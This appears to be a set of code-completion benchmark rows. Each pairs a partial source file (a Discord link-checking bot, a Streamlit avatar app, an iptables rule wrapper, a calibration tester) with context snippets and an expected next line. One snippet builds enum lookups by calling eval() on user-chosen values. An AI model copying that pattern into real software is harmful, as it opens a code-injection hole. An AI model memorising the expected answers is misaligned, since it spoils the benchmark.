sent = await user.send(content=f"\n{attach}", embed=embed)
await sent.add_reaction("❌")
except discord.Forbidden:
await channel.send(
f"**{user.mention} I do not have permission to DM you. Please enable DMs for this server.**"
)
# Delete message if user has roles that can manage messages
if (
emoji == self.del_emoji
and msg.author.id == self.bot.user.id
and payload.user_id != self.bot.user.id
):
for role in payload.member.roles:
|
class EventHandling(commands.Cog):
"""EventHandling commands"""
def __init__(self, bot: Bot):
self.bot = bot
self.bookmark_emoji = discord.PartialEmoji(name="🔖")
self.del_emoji = discord.PartialEmoji(name="❌")
self.last_single_page_update = 0
self.single_page = ""
self.dead_sites_messages = set()
self.deleted_sites_messages = set()
@tasks.loop(minutes=5)
async def update_single_page(self):
async with self.bot.session.get(
"https://raw.githubusercontent.com/fmhy/FMHYedit/main/single-page"
) as response:
self.single_page = await response.text()
async def cog_before_invoke(self, ctx):
"""Triggers typing indicator on Discord before every command."""
await ctx.channel.typing()
return
async def get_duplicate_non_duplicate_links(self, message_links):
if time.time() - self.last_single_page_update >= 300:
await self.update_single_page()
wiki_links = set(
re.findall(
url_regex,
self.single_page,
)
)
duplicate_links = wiki_links.intersection(message_links)
non_duplicate_links = message_links - duplicate_links
return duplicate_links, non_duplicate_links
@commands.Cog.listener()
async def on_ready(self):
self.update_single_page.start()
dead_sites_channel = self.bot.get_channel(988133247575810059)
if dead_sites_channel:
self.dead_sites_messages = set(await dead_sites_channel.history(limit=None).flatten())
deleted_sites_channel = self.bot.get_channel(986617857133649921)
if deleted_sites_channel:
self.deleted_sites_messages = set(
await deleted_sites_channel.history(limit=None).flatten()
)
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.channel.id in auto_thread_channels and any(
str(role) in message.content for role in auto_thread_roles
):
await message.create_thread(
name="Auto-Thread - Please keep discussions in here!",
reason="Auto thread created by FMHY Bot")
if message.author.bot:
return
if message.channel.id in channel_ids:
message_links = set(re.findall(url_regex, message.content))
if message_links:
(
duplicate_links,
non_duplicate_links,
) = await self.get_duplicate_non_duplicate_links(message_links)
# One link, duplicate
if len(message_links) == 1 and len(duplicate_links) == 1:
reply_message = await message.reply("**This link is already in the wiki!**")
await reply_message.add_reaction("❌")
return
# All links, duplicates
elif len(message_links) > 1 and len(message_links) == len(duplicate_links):
reply_message = await message.reply(
"**All of these links are already in the wiki!**"
)
await reply_message.add_reaction("❌")
return
# Partial duplicates
elif len(message_links) > 1 and len(duplicate_links) >= 1:
non_duplicate_links_string = "\n".join(
[f"{protocol}://{link}" for protocol,
link in non_duplicate_links]
)
non_duplicate_links_embed = cembed(
title="__Non-Duplicate Links:__",
description=f"{non_duplicate_links_string}",
)
non_duplicate_links_embed.set_author(
name=message.author.name,
icon_url=message.author.display_avatar,
)
reply_message = await message.reply(embed=non_duplicate_links_embed)
await reply_message.add_reaction("❌")
return
@commands.Cog.listener()
async def on_raw_reaction_add(self, payload):
emoji = payload.emoji
chan_id = payload.channel_id
msg_id = payload.message_id
channel = await self.bot.fetch_channel(chan_id)
msg: discord.Message = await channel.fetch_message(msg_id)
user = await self.bot.fetch_user(payload.user_id)
if not isinstance(channel, discord.DMChannel):
# Bookmark message
if emoji == self.bookmark_emoji:
attachments = msg.attachments
embed = discord.Embed(color=0x2B2D31, timestamp=datetime.now())
embed.set_author(name=msg.author.name,
icon_url=msg.author.display_avatar)
embed.description = msg.content[:4096]
embed.add_field(
name="Jump", value=f"[Go to Message!]({msg.jump_url})")
embed.set_footer(
text=f"Guild: {channel.guild.name} | Channel: #{channel.name}")
attach = ""
if attachments:
img_added = False
for attachment in attachments:
if img_added is False:
if attachment.content_type in [
"image/avif",
"image/jpeg",
"image/png",
]:
try:
embed.set_image(url=attachment.url)
except:
pass
img_added = True
attach += f"{attachment.url}\n"
try:
sent = await user.send(content=f"\n{attach}", embed=embed)
await sent.add_reaction("❌")
except discord.Forbidden:
await channel.send(
f"**{user.mention} I do not have permission to DM you. Please enable DMs for this server.**"
)
# Delete message if user has roles that can manage messages
if (
emoji == self.del_emoji
and msg.author.id == self.bot.user.id
and payload.user_id != self.bot.user.id
):
for role in payload.member.roles: | if role.id in managing_roles: | 0 | 2023-12-19 10:27:04+00:00 | 4k |
morikeli/persona | main.py | [
{
"identifier": "facial_expression",
"path": "features/person/faces/expressions/facial_expression.py",
"snippet": "FACIAL_EXPRESSIONS = [\n 'DEFAULT',\n 'ANGRY',\n 'ANGRY_NATURAL',\n 'DEFAULT_NATURAL',\n 'FLAT_NATURAL',\n 'FROWN_NATURAL',\n 'RAISED_EXCITED',\n 'RAISED_EXCITED_NATURAL',\n 'SAD_CONCERNED',\n 'SAD_CONCERNED_NATURAL',\n 'UNI_BROW_NATURAL',\n 'UP_DOWN',\n 'UP_DOWN_NATURAL',\n]\nFACIAL_EXPRESSIONS_MOUTH = [\n 'DEFAULT',\n 'CONCERNED',\n 'DISBELIEF',\n 'EATING',\n 'GRIMACE',\n 'SAD',\n 'SCREAM_OPEN',\n 'SERIOUS',\n 'SMILE',\n 'TONGUE',\n 'TWINKLE',\n 'VOMIT',\n]"
},
{
"identifier": "add_ons",
"path": "features/fashion/accessories/add_ons.py",
"snippet": "FASHION_ACCESSORIES = [\n 'DEFAULT',\n 'KURT',\n 'PRESCRIPTION_01',\n 'PRESCRIPTION_02',\n 'ROUND',\n 'SUNGLASSES',\n 'WAYFARERS',\n]"
},
{
"identifier": "clothes",
"path": "features/fashion/clothing/clothes.py",
"snippet": "CLOTHES_CATEGORIES = [\n 'BLAZER_SHIRT',\n 'BLAZER_SWEATER',\n 'COLLAR_SWEATER',\n 'GRAPHIC_SHIRT',\n 'HOODIE',\n 'OVERALL',\n 'SHIRT_CREW_NECK',\n 'SHIRT_SCOOP_NECK',\n 'SHIRT_V_NECK',\n]\nCLOTHES_COLOR = [\n 'BLACK',\n 'BLUE_01',\n 'BLUE_02',\n 'BLUE_03',\n 'GRAY_01',\n 'GRAY_02',\n 'HEATHER',\n 'PASTEL_BLUE',\n 'PASTEL_GREEN',\n 'PASTEL_ORANGE',\n 'PASTEL_RED',\n 'PASTEL_YELLOW',\n 'PINK',\n 'RED',\n 'WHITE',\n]\nCLOTHES_GRAPHICS = [\n 'BAT',\n 'BEAR',\n 'CUMBIA',\n 'DEER',\n 'DIAMOND',\n 'HOLA',\n 'PIZZA',\n 'RESIST',\n 'SELENA',\n 'SKULL',\n 'SKULL_OUTLINE',\n]"
},
{
"identifier": "hats",
"path": "features/fashion/clothing/hats.py",
"snippet": "HEADWEAR = [\n 'EYE_PATCH',\n 'HAT',\n 'HIJAB',\n 'TURBAN',\n 'WINTER_HAT1',\n 'WINTER_HAT2',\n 'WINTER_HAT3',\n 'WINTER_HAT4',\n]\nHAT_COLOR = [\n 'BLACK',\n 'BLUE_01',\n 'BLUE_02',\n 'BLUE_03',\n 'GRAY_01',\n 'GRAY_02',\n 'HEATHER',\n 'PASTEL_BLUE',\n 'PASTEL_GREEN',\n 'PASTEL_ORANGE',\n 'PASTEL_RED',\n 'PASTEL_YELLOW',\n 'PINK',\n 'RED',\n 'WHITE',\n\n]"
},
{
"identifier": "beard",
"path": "features/fashion/hairstyles/beard.py",
"snippet": "BEARD = [\n 'DEFAULT',\n 'BEARD_MEDIUM',\n 'BEARD_LIGHT',\n 'BEARD_MAJESTIC',\n 'MOUSTACHE_FANCY',\n 'MOUSTACHE_MAGNUM',\n]\nBEARD_COLOR = [\n 'AUBURN',\n 'BLACK',\n 'BLONDE',\n 'BLONDE_GOLDEN',\n 'BROWN',\n 'BROWN_DARK',\n 'PASTEL_PINK',\n 'PLATINUM',\n 'RED',\n 'SILVER_GRAY',\n]"
},
{
"identifier": "hair",
"path": "features/fashion/hairstyles/hair.py",
"snippet": "HAIR_COLOR = [\n 'AUBURN',\n 'BLACK',\n 'BLONDE',\n 'BLONDE_GOLDEN',\n 'BROWN',\n 'BROWN_DARK',\n 'PASTEL_PINK',\n 'PLATINUM',\n 'RED',\n 'SILVER_GRAY',\n]\nHAIR_STYLES = [\n 'NO_HAIR',\n 'LONG_HAIR_BIG_HAIR',\n 'LONG_HAIR_BOB',\n 'LONG_HAIR_BUN',\n 'LONG_HAIR_CURLY',\n 'LONG_HAIR_CURVY',\n 'LONG_HAIR_DREADS',\n 'LONG_HAIR_FRIDA',\n 'LONG_HAIR_FRO',\n 'LONG_HAIR_FRO_BAND',\n 'LONG_HAIR_NOT_TOO_LONG',\n 'LONG_HAIR_SHAVED_SIDES',\n 'LONG_HAIR_MIA_WALLACE',\n 'LONG_HAIR_STRAIGHT',\n 'LONG_HAIR_STRAIGHT2',\n 'LONG_HAIR_STRAIGHT_STRAND',\n 'SHORT_HAIR_DREADS_01',\n 'SHORT_HAIR_DREADS_02',\n 'SHORT_HAIR_FRIZZLE',\n 'SHORT_HAIR_SHAGGY_MULLET',\n 'SHORT_HAIR_SHORT_CURLY',\n 'SHORT_HAIR_SHORT_FLAT',\n 'SHORT_HAIR_SHORT_ROUND',\n 'SHORT_HAIR_SHORT_WAVED',\n 'SHORT_HAIR_SIDES',\n 'SHORT_HAIR_THE_CAESAR',\n 'SHORT_HAIR_THE_CAESAR_SIDE_PART',\n]"
},
{
"identifier": "skins",
"path": "features/person/complexion/skins.py",
"snippet": "SKIN_COLOR = [\n 'BLACK',\n 'BROWN',\n 'DARK_BROWN',\n 'LIGHT',\n 'PALE',\n 'TANNED',\n 'YELLOW',\n \n]"
},
{
"identifier": "face",
"path": "features/person/faces/face.py",
"snippet": "EYES = [\n 'DEFAULT',\n 'CLOSE',\n 'CRY',\n 'DIZZY',\n 'EYE_ROLL',\n 'HAPPY',\n 'HEARTS',\n 'SIDE',\n 'SQUINT',\n 'SURPRISED',\n 'WINK',\n 'WINK_WACKY',\n]"
},
{
"identifier": "random_avatar",
"path": "avatar/avatar.py",
"snippet": "def random_avatar():\n \"\"\" This is a function that automatically generates an avatar using random avatar features. \"\"\"\n\n features = {\n 'accessories': randrange(0, len(add_ons.FASHION_ACCESSORIES)),\n 'background': randrange(0, len(['CIRCLE', 'TRANSPARENT'])),\n 'beard': randrange(0, len(beard.BEARD)),\n 'beard_color': randrange(0, len(beard.BEARD_COLOR)),\n 'clothing': randrange(0, len(clothes.CLOTHES_CATEGORIES)),\n 'clothes_color': randrange(0, len(clothes.CLOTHES_COLOR)),\n 'clothes_art': randrange(0, len(clothes.CLOTHES_GRAPHICS)),\n 'eyes': randrange(0, len(face.EYES)),\n 'face_expression': randrange(0, len(facial_expression.FACIAL_EXPRESSIONS)),\n 'hair': randrange(0, len(hair.HAIR_STYLES)),\n 'headwear': randrange(0, len(hats.HEADWEAR)),\n 'hair_and_headwear': randrange(0, len(hair.HAIR_STYLES + hats.HEADWEAR)),\n 'hair_color': randrange(0, len(hair.HAIR_COLOR)),\n 'hat_color': randrange(0, len(hats.HAT_COLOR)),\n 'mouth': randrange(0, len(facial_expression.FACIAL_EXPRESSIONS_MOUTH)),\n 'skin': randrange(0, len(skins.SKIN_COLOR)),\n }\n\n return features"
},
{
"identifier": "custom_avatar",
"path": "avatar/avatar.py",
"snippet": "def custom_avatar(features):\n \"\"\" This is a function that generates an avatar depending on the user's input. \"\"\"\n\n avatar = pa.PyAvataaar(\n accessories_type=eval(f'pa.AccessoriesType.{features[\"accessories\"]}'),\n clothe_type=eval(f'pa.ClotheType.{features[\"clothing\"]}'),\n clothe_color=eval(f'pa.Color.{features[\"clothes_color\"]}'),\n clothe_graphic_type=eval(f'pa.ClotheGraphicType.{features[\"clothes_art\"]}'),\n eye_type=eval(f'pa.EyesType.{features[\"eyes\"]}'),\n eyebrow_type=eval(f'pa.EyebrowType.{features[\"face_expression\"]}'),\n hair_color=eval(f'pa.HairColor.{features[\"hair_color\"]}'),\n hat_color=eval(f'pa.Color.{features[\"hat_color\"]}'),\n facial_hair_type=eval(f'pa.FacialHairType.{features[\"beard\"]}'),\n facial_hair_color=eval(f'pa.HairColor.{features[\"beard_color\"]}'),\n mouth_type=eval(f'pa.MouthType.{features[\"mouth\"]}'),\n skin_color=eval(f'pa.SkinColor.{features[\"skin\"]}'),\n style=eval(f'pa.AvatarStyle.{features[\"bg\"]}'),\n top_type=eval(f'pa.TopType.SHORT_HAIR_SHORT_FLAT.{features[\"hair_and_headwear\"]}'),\n\n )\n\n render_img = avatar.render_png_file(IMAGE_FILE)\n image = Image.open(IMAGE_FILE)\n\n return update_avatar_image(image)"
},
{
"identifier": "christmas_festive_animation",
"path": "animations/utils.py",
"snippet": "def christmas_festive_animation():\n \"\"\" Display snowflakes animaton during Christmas festive season. \"\"\"\n \n current_year = dt.now().date()\n previous_year = dt.today().year - 1\n current_festive_date = dt(year=previous_year, month=12, day=20).date()\n date_diff = current_year - current_festive_date\n\n if (date_diff.days >= 0) and (date_diff.days <= 21):\n return st.snow()"
},
{
"identifier": "download_avatar",
"path": "images/image.py",
"snippet": "def download_avatar(avatar_image):\n \"\"\" This function allows one to download their avatars.\"\"\"\n\n with open(avatar_image, 'rb') as image_file:\n st.download_button(\n label='Download avatar',\n type=\"primary\",\n data=image_file,\n file_name=avatar_image,\n use_container_width=True\n )\n \n return image_file"
}
] | from features.person.faces.expressions import facial_expression as fe
from features.fashion.accessories import add_ons
from features.fashion.clothing import clothes, hats
from features.fashion.hairstyles import beard, hair
from features.person.complexion import skins
from features.person.faces import face
from avatar.avatar import random_avatar, custom_avatar
from animations.utils import christmas_festive_animation
from images.image import download_avatar
import streamlit as st | 3,132 |
# webpage configuration
st.set_page_config(page_title='Persona', page_icon=':busts_in_silhouette:', layout='centered')
with open('static/css/styles.css') as stylesheet:
st.markdown(f'<style>{stylesheet.read()}</style>', unsafe_allow_html=True)
def main(features_indices: dict = None):
""" This is the main function that uses streamlit to create a dynamic web page. """
# navigation tabs
tabs = st.tabs(['Beard & Hair', 'Facial features', 'Fashion trends', 'Color', 'Background style'])
st.divider()
# "Generate random avatar" & "Download button" buttons column
cols_btn = st.columns([6, 6])
with cols_btn[1]:
download_btn = download_avatar()
if download_btn: # display download button by default
# download_avatar()
st.balloons()
if cols_btn[0].button('Generate random avatar', use_container_width=True):
features_indices = random_avatar()
with tabs[0]:
st.caption('Add beard, hairstyle or hair cut')
avatar_hair = st.selectbox(
label=':haircut: Hair',
options=hair.HAIR_STYLES,
index=features_indices["hair"] if features_indices else 0,
)
avatar_beard = st.selectbox(
label=':bearded_person: Beard',
options=beard.BEARD,
index=features_indices["beard"] if features_indices else 0,
)
with tabs[1]:
st.caption('Add eyes or facial expression.')
avatar_eyes = st.selectbox(
label=':eyes: Eyes',
options=face.EYES,
index=features_indices["eyes"] if features_indices else 0,
)
avatar_facial_expr = st.selectbox(
label=':smiley: Facial expression',
options=fe.FACIAL_EXPRESSIONS,
index=features_indices["face_expression"] if features_indices else 0,
)
avatar_mouth = st.selectbox(
label=':lips: Mouth',
options=fe.FACIAL_EXPRESSIONS_MOUTH,
index=features_indices["mouth"] if features_indices else 0,
)
with tabs[2]:
st.caption("What are your favorite fashion trends?")
tabs_cols = st.columns([6, 6])
avatar_addons = tabs_cols[0].selectbox(
label=':sunglasses: Accessories',
options=add_ons.FASHION_ACCESSORIES,
index=features_indices["accessories"] if features_indices else 0,
)
avatar_clothe = tabs_cols[0].selectbox(
label=':tshirt: Clothes',
|
# webpage configuration
st.set_page_config(page_title='Persona', page_icon=':busts_in_silhouette:', layout='centered')
with open('static/css/styles.css') as stylesheet:
st.markdown(f'<style>{stylesheet.read()}</style>', unsafe_allow_html=True)
def main(features_indices: dict = None):
""" This is the main function that uses streamlit to create a dynamic web page. """
# navigation tabs
tabs = st.tabs(['Beard & Hair', 'Facial features', 'Fashion trends', 'Color', 'Background style'])
st.divider()
# "Generate random avatar" & "Download button" buttons column
cols_btn = st.columns([6, 6])
with cols_btn[1]:
download_btn = download_avatar()
if download_btn: # display download button by default
# download_avatar()
st.balloons()
if cols_btn[0].button('Generate random avatar', use_container_width=True):
features_indices = random_avatar()
with tabs[0]:
st.caption('Add beard, hairstyle or hair cut')
avatar_hair = st.selectbox(
label=':haircut: Hair',
options=hair.HAIR_STYLES,
index=features_indices["hair"] if features_indices else 0,
)
avatar_beard = st.selectbox(
label=':bearded_person: Beard',
options=beard.BEARD,
index=features_indices["beard"] if features_indices else 0,
)
with tabs[1]:
st.caption('Add eyes or facial expression.')
avatar_eyes = st.selectbox(
label=':eyes: Eyes',
options=face.EYES,
index=features_indices["eyes"] if features_indices else 0,
)
avatar_facial_expr = st.selectbox(
label=':smiley: Facial expression',
options=fe.FACIAL_EXPRESSIONS,
index=features_indices["face_expression"] if features_indices else 0,
)
avatar_mouth = st.selectbox(
label=':lips: Mouth',
options=fe.FACIAL_EXPRESSIONS_MOUTH,
index=features_indices["mouth"] if features_indices else 0,
)
with tabs[2]:
st.caption("What are your favorite fashion trends?")
tabs_cols = st.columns([6, 6])
avatar_addons = tabs_cols[0].selectbox(
label=':sunglasses: Accessories',
options=add_ons.FASHION_ACCESSORIES,
index=features_indices["accessories"] if features_indices else 0,
)
avatar_clothe = tabs_cols[0].selectbox(
label=':tshirt: Clothes', | options=clothes.CLOTHES_CATEGORIES, | 2 | 2023-12-19 09:39:04+00:00 | 4k |
JonatanNevo/better-iptables | iptables/iptables.py | [
{
"identifier": "ConnbytesDirection",
"path": "iptables/enums.py",
"snippet": "class ConnbytesDirection(str, Enum):\n ORIGINAL = \"original\"\n REPLY = \"reply\"\n BOTH = \"both\""
},
{
"identifier": "ConnbytesMode",
"path": "iptables/enums.py",
"snippet": "class ConnbytesMode(str, Enum):\n BYTES = \"bytes\"\n PACKETS = \"packets\"\n AVGERAGE = \"avgpkt\""
},
{
"identifier": "ConntrackStates",
"path": "iptables/enums.py",
"snippet": "class ConntrackStates(str, Enum):\n INVALID = \"INVALID\"\n ESTABLISHED = \"ESTABLISHED\"\n RELATED = \"RELATED\"\n UNTRACKED = \"UNTRACKED\"\n SNAT = \"SNAT\"\n DNAT = \"DNAT\"\n NEW = \"NEW\""
},
{
"identifier": "ConntrackStatus",
"path": "iptables/enums.py",
"snippet": "class ConntrackStatus(str, Enum):\n NONE = \"NONE\"\n EXPECTED = \"EXPECTED\"\n SEEN_REPLY = \"SEEN_REPLY\"\n ASSURED = \"ASSURED\"\n CONFIRMED = \"CONFIRMED\""
},
{
"identifier": "ConntrackDirection",
"path": "iptables/enums.py",
"snippet": "class ConntrackDirection(str, Enum):\n ORIGINAL = \"original\"\n REPLY = \"reply\""
},
{
"identifier": "LimitUnits",
"path": "iptables/enums.py",
"snippet": "class LimitUnits(str, Enum):\n SECOND = \"second\"\n MINUTE = \"minute\"\n HOUR = \"hour\"\n DAY = \"day\""
},
{
"identifier": "State",
"path": "iptables/enums.py",
"snippet": "class State(str, Enum):\n INVALID = \"INVALID\"\n ESTABLISHED = \"ESTABLISHED\"\n NEW = \"NEW\"\n RELATED = \"RELATED\"\n UNTRACKED = \"UNTRACKED\""
},
{
"identifier": "TcpFlags",
"path": "iptables/enums.py",
"snippet": "class TcpFlags(str, Enum):\n SYN = \"SYN\"\n ACK = \"ACK\"\n FIN = \"FIN\"\n RST = \"RST\"\n URG = \"URG\"\n PSH = \"PSH\"\n ALL = \"ALL\"\n NONE = \"NONE\""
},
{
"identifier": "Targets",
"path": "iptables/enums.py",
"snippet": "class Targets(str, Enum):\n ACCEPT = \"ACCEPT\"\n DROP = \"DROP\"\n RETURN = \"RETURN\"\n AUDIT = \"AUDIT\"\n CHECKSUM = \"CHECKSUM\"\n CLASSIFY = \"CLASSIFY\"\n CLUSTERIP = \"CLUSTERIP\"\n CONNMARK = \"CONNMARK\"\n CONNSECMARK = \"CONNSECMARK\"\n CT = \"CT\"\n DNAT = \"DNAT\"\n DNPT = \"DNPT\"\n DSCP = \"DSCP\"\n ECN = \"ECN\"\n HL = \"HL\"\n HMARK = \"HMARK\"\n IDLETIMER = \"IDLETIMER\"\n LED = \"LED\"\n LOG = \"LOG\"\n MARK = \"MARK\"\n MASQUERADE = \"MASQUERADE\"\n NETMAP = \"NETMAP\"\n NFLOG = \"NFLOG\"\n NFQUEUE = \"NFQUEUE\"\n NOTRACK = \"NOTRACK\"\n RATEEST = \"RATEEST\"\n REDIRECT = \"REDIRECT\"\n REJECT = \"REJECT\"\n SECMARK = \"SECMARK\"\n SET = \"SET\"\n SNAT = \"SNAT\"\n SNPT = \"SNPT\"\n SYNPROXY = \"SYNPROXY\"\n TCPMSS = \"TCPMSS\"\n TCPOPTSTRIP = \"TCPOPTSTRIP\"\n TEE = \"TEE\"\n TOS = \"TOS\"\n TPROXY = \"TPROXY\"\n TRACE = \"TRACE\"\n TTL = \"TTL\"\n ULOG = \"ULOG\""
},
{
"identifier": "Protocols",
"path": "iptables/enums.py",
"snippet": "class Protocols(str, Enum):\n TCP = \"tcp\"\n UDP = \"udp\"\n ICMP = \"icmp\"\n ALL = \"all\""
},
{
"identifier": "Tables",
"path": "iptables/enums.py",
"snippet": "class Tables(str, Enum):\n FILTER = \"filter\"\n NAT = \"nat\"\n MANGLE = \"mangle\"\n RAW = \"raw\"\n SECURITY = \"security\""
},
{
"identifier": "Chains",
"path": "iptables/enums.py",
"snippet": "class Chains(str, Enum):\n INPUT = \"INPUT\"\n FORWARD = \"FORWARD\"\n OUTPUT = \"OUTPUT\"\n PREROUTING = \"PREROUTING\"\n POSTROUTING = \"POSTROUTING\""
},
{
"identifier": "Actions",
"path": "iptables/enums.py",
"snippet": "class Actions(str, Enum):\n APPEND = \"-A\"\n DELETE = \"-D\"\n INSERT = \"-I\"\n REPLACE = \"-R\"\n CHECK = \"-C\"\n LIST = \"-L\"\n FLUSH = \"-F\"\n ZERO = \"-Z\"\n NEW_CHAIN = \"-N\"\n DELETE_CHAIN = \"-X\"\n RENAME_CHAIN = \"-E\"\n POLICY = \"-P\"\n LIST_RULES = \"-S\""
},
{
"identifier": "RejectType",
"path": "iptables/enums.py",
"snippet": "class RejectType(str, Enum):\n ICMP_NET_UNREACHABLE = \"icmp-net-unreachable\"\n ICMP_HOST_UNREACHABLE = \"icmp-host-unreachable\"\n ICMP_PORT_UNREACHABLE = \"icmp-port-unreachable\"\n ICMP_PROT_UNREACHABLE = \"icmp-proto-unreachable\"\n ICMP_NET_PROHIBITED = \"icmp-net-prohibited\"\n ICMP_HOST_PROHIBITED = \"icmp-host-prohibited\"\n ICMP_ADMIN_PROHIBITED = \"icmp-admin-prohibited\"\n TCP_RESET = \"tcp-reset\"\n ICMP6_NO_ROUTE = \"icmp6-no-route\"\n NO_ROUTE = \"no-route\"\n ICMP6_ADM_PROHIBITED = \"icmp6-adm-prohibited\"\n ADM_PROHIBITED = \"adm-prohibited\"\n ICMP6_ADDR_UNREACHABLE = \"icmp6-addr-unreachable\"\n ADDR_UNREACHABLE = \"addr-unreach\"\n ICMP6_PORT_UNREACHABLE = \"icmp6-port-unreachable\""
},
{
"identifier": "IPTablesError",
"path": "iptables/exceptions.py",
"snippet": "class IPTablesError(Exception):\n pass"
},
{
"identifier": "IPVersionError",
"path": "iptables/exceptions.py",
"snippet": "class IPVersionError(IPTablesError):\n def __init__(self):\n super().__init__(\"ipv4 and ipv6 cannot be both True\")"
},
{
"identifier": "ConnbytesError",
"path": "iptables/exceptions.py",
"snippet": "class ConnbytesError(IPTablesError):\n def __init__(self):\n super().__init__(\"connbytes must be in the format of 'bytes:bytes'\")"
},
{
"identifier": "ConnlimitAddrError",
"path": "iptables/exceptions.py",
"snippet": "class ConnlimitAddrError(IPTablesError):\n def __init__(self):\n super().__init__(\"saddr and daddr cannot be both True\")"
},
{
"identifier": "MultiportSourceAndDestinationError",
"path": "iptables/exceptions.py",
"snippet": "class MultiportSourceAndDestinationError(IPTablesError):\n def __init__(self):\n super().__init__(\"source_ports and destination_ports cannot be both True\")"
},
{
"identifier": "MultiportPortsAndOtherError",
"path": "iptables/exceptions.py",
"snippet": "class MultiportPortsAndOtherError(IPTablesError):\n def __init__(self):\n super().__init__(\"ports cannot be used with source_ports or destination_ports\")"
},
{
"identifier": "MultiportFormatError",
"path": "iptables/exceptions.py",
"snippet": "class MultiportFormatError(IPTablesError):\n def __init__(self):\n super().__init__(\"ports must be an int or a string in format of 'port:port'\")"
}
] | import dataclasses
import re
from enum import Enum
from typing import Optional, Union, List, Tuple
from typing_extensions import Self
from iptables.enums import ConnbytesDirection, ConnbytesMode, ConntrackStates, ConntrackStatus, ConntrackDirection, \
LimitUnits, State, TcpFlags, Targets, Protocols, Tables, Chains, Actions, RejectType
from iptables.exceptions import IPTablesError, IPVersionError, ConnbytesError, ConnlimitAddrError, \
MultiportSourceAndDestinationError, MultiportPortsAndOtherError, MultiportFormatError | 2,105 |
@dataclasses.dataclass(frozen=True)
class Module:
module: str
parameters: List[Tuple[str, str]] = dataclasses.field(default_factory=list)
def build(self) -> str:
parameters = []
for argument, value in self.parameters:
if value:
parameters.append(f"--{argument} {value}")
else:
parameters.append(f"--{argument}")
return f"-m {self.module} {' '.join(parameters)}"
@dataclasses.dataclass(frozen=True)
class Flags:
ipv4: bool = True
ipv6: bool = False
fragment: bool = False
lock: bool = False # same as --wait
verbose: bool = False
resolve: bool = True # same as --numeric
exact: bool = False
def __post_init__(self) -> None:
if self.ipv4 and self.ipv6:
raise IPVersionError
def build(self) -> str:
flags = []
if self.fragment:
flags.append("-f")
if self.ipv4:
flags.append("-4")
elif self.ipv6:
flags.append("-6")
if self.lock:
flags.append("-w")
if self.verbose:
flags.append("-v")
if not self.resolve:
flags.append("-n")
if self.exact:
flags.append("-x")
return " ".join(flags)
def __str__(self) -> str:
return self.build()
@dataclasses.dataclass(frozen=True)
class Matches:
# TODO: add set-counters
|
@dataclasses.dataclass(frozen=True)
class Module:
module: str
parameters: List[Tuple[str, str]] = dataclasses.field(default_factory=list)
def build(self) -> str:
parameters = []
for argument, value in self.parameters:
if value:
parameters.append(f"--{argument} {value}")
else:
parameters.append(f"--{argument}")
return f"-m {self.module} {' '.join(parameters)}"
@dataclasses.dataclass(frozen=True)
class Flags:
ipv4: bool = True
ipv6: bool = False
fragment: bool = False
lock: bool = False # same as --wait
verbose: bool = False
resolve: bool = True # same as --numeric
exact: bool = False
def __post_init__(self) -> None:
if self.ipv4 and self.ipv6:
raise IPVersionError
def build(self) -> str:
flags = []
if self.fragment:
flags.append("-f")
if self.ipv4:
flags.append("-4")
elif self.ipv6:
flags.append("-6")
if self.lock:
flags.append("-w")
if self.verbose:
flags.append("-v")
if not self.resolve:
flags.append("-n")
if self.exact:
flags.append("-x")
return " ".join(flags)
def __str__(self) -> str:
return self.build()
@dataclasses.dataclass(frozen=True)
class Matches:
# TODO: add set-counters | protocol: Optional[Protocols] = None | 9 | 2023-12-17 17:00:49+00:00 | 4k |
cvlab-yonsei/RankMixup | tools/test_net.py | [
{
"identifier": "Tester",
"path": "calibrate/engine/tester.py",
"snippet": "class Tester:\n def __init__(self, cfg: DictConfig) -> None:\n self.cfg = cfg\n self.work_dir = self.cfg.work_dir\n self.device = torch.device(self.cfg.device)\n self.build_data_loader()\n self.build_model(self.cfg.test.checkpoint)\n self.build_meter()\n self.init_wandb_or_not()\n\n def build_data_loader(self) -> None:\n # data pipeline\n self.test_loader = instantiate(self.cfg.data.object.test)\n\n def build_model(self, checkpoint: Optional[str] = \"\") -> None:\n self.model = instantiate(self.cfg.model.object)\n self.model.to(self.device)\n logger.info(\"Model initialized\")\n self.checkpoint_path = osp.join(\n self.work_dir, \"last.pth\" if checkpoint == \"\" else checkpoint #best.pth\n )\n load_checkpoint(self.checkpoint_path, self.model, self.device)\n\n def build_meter(self):\n self.batch_time_meter = AverageMeter()\n self.num_classes = self.cfg.model.num_classes\n self.evaluator = ClassificationEvaluator(self.num_classes)\n self.calibrate_evaluator = CalibrateEvaluator(\n self.num_classes,\n num_bins=self.cfg.calibrate.num_bins,\n device=self.device,\n )\n\n def reset_meter(self):\n self.batch_time_meter.reset()\n self.evaluator.reset()\n self.calibrate_evaluator.reset()\n\n def init_wandb_or_not(self) -> None:\n if self.cfg.wandb.enable:\n wandb.init(\n project=self.cfg.wandb.project,\n entity=self.cfg.wandb.entity,\n config=OmegaConf.to_container(self.cfg, resolve=True),\n tags=[\"test\"],\n )\n wandb.run.name = \"{}-{}-{}\".format(\n wandb.run.id, self.cfg.model.name, self.cfg.loss.name\n )\n wandb.run.save()\n wandb.watch(self.model, log=None)\n logger.info(\"Wandb initialized : {}\".format(wandb.run.name))\n\n def mixup_data(self, x, y, alpha=1.0, use_cuda=True):\n import numpy as np\n '''Returns mixed inputs, pairs of targets, and lambda'''\n if alpha > 0:\n lam = np.random.beta(alpha, alpha)\n # else:\n # lam = 0.5\n\n batch_size = x.size()[0]\n if use_cuda:\n index = torch.randperm(batch_size).cuda()\n else:\n index = torch.randperm(batch_size)\n\n mixed_x = lam * x + (1 - lam) * x[index, :]\n y_a, y_b = y, y[index]\n \n return mixed_x, y_a, y_b, lam\n\n @torch.no_grad()\n def eval_epoch(\n self, data_loader,\n phase=\"Val\",\n temp=1.0,\n post_temp=False,\n ) -> None:\n self.reset_meter()\n self.model.eval()\n\n end = time.time()\n \n for i, (inputs, labels) in enumerate(data_loader):\n inputs, labels = inputs.to(self.device), labels.to(self.device)\n # forward\n outputs = self.model(inputs)\n # logits = self.model.forward_logit(inputs)\n if post_temp:\n outputs = outputs / temp\n # metric\n self.calibrate_evaluator.update(outputs, labels)\n predicts = F.softmax(outputs, dim=1)\n self.evaluator.update(\n to_numpy(predicts), to_numpy(labels)\n )\n # measure elapsed time\n self.batch_time_meter.update(time.time() - end)\n end = time.time()\n self.log_eval_epoch_info(phase)\n if self.cfg.test.save_logits:\n logits_save_path = (\n osp.splitext(self.checkpoint_path)[0]\n + \"_logits\"\n + (\"_pt.npz\" if post_temp else \".npz\")\n )\n 